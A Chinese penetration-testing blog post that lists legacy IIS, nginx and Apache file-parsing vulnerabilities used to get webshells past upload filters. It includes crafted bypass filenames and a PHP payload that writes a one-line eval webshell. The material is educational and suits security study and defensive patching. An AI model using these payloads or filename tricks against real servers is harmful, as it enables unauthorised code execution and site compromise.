滲透測試之解析漏洞

2021-08-13 08:43:37 字數 780 閱讀 7217

現在對上傳的檔案校驗越來越嚴格了,所以導致webshell難以上傳,而後面解析漏洞的出現在配合檔案上傳,可以成功上傳webshell。危害程度很高

現在整理一些網上公布的解析漏洞。不過都是很老的版本,所以前期資訊收集很重要,要是遇到這些版本就可以用上了。

1.iis5.x-iis6.0版本

1.1 目錄包含.asp或者.asa時,目錄下任何副檔名的檔案都會當做asp執行

例如  目錄下c:/test.asp/test.jpg

那麼test.jpg也會被當做asp檔案執行。

1.2 分號截斷

分號後面的不被解析,例如 test.asp;.jpg  這個檔案上傳後,當做test.asp執行

2.iis7.0|iis7.5|nginx<8.03畸形解析漏洞

在開啟fast-cgi時上傳內容為

<?php fputs(fopen('webshell.php','w'),'<?php eval($_post[c]) ?>'); ?>

檔名為test.jpg,訪問test.jpg/.php會生成一句話webshell.php

3.nginx<8.03 空位元組**執行

訪問時test.jpg%00.php 會把這個檔案當做php執行

4.apache解析漏洞

apache解析由右向左執行,但是有個問題,apache不認識的字尾不解析,一直到認識的字尾

例如:test.php.dsdsd.dfsdsd

會當做test.php執行

我本地測試了一下發現這個漏洞只有低版本的apache才有效

滲透測試之伺服器解析漏洞

0x00 總覽說明 伺服器解析漏洞算是歷史比較悠久了,但如今依然廣泛存在。在此記錄彙總一些常見伺服器 web server 的解析漏洞,比如iis6.0 iis7.5 apache nginx等方便以後回顧溫習。0x01 歸納總結 一 iis5.x 6.x解析漏洞 使用iis5.x 6.x版本的伺服...

滲透測試之環境漏洞修補

如題,在執行滲透測試的時候發現了部分環境的漏洞需要修補,基本上是因為軟體版本太低所以需要公升級,記錄相關公升級的流程和資料如下 歷史環境為ubuntu16.04,nginx1.12,openssh5.7。1 nginx版本要求1.16以上 解除安裝nginx sudo apt get purge r...

滲透測試之漏洞驗證篇

msf 是乙個滲透測試利用框架,在這個框架中整合了很多漏洞檢測和利用的指令碼工具,可以讓我們直接利用,省去了在網路中查詢指令碼的時間。msf 資料庫為 postgresql,在使用時要保證其是開啟的 確定使用的指令碼工具,可以通過search來搜尋 使用對應的指令碼,use 搜尋序號 或use 指令...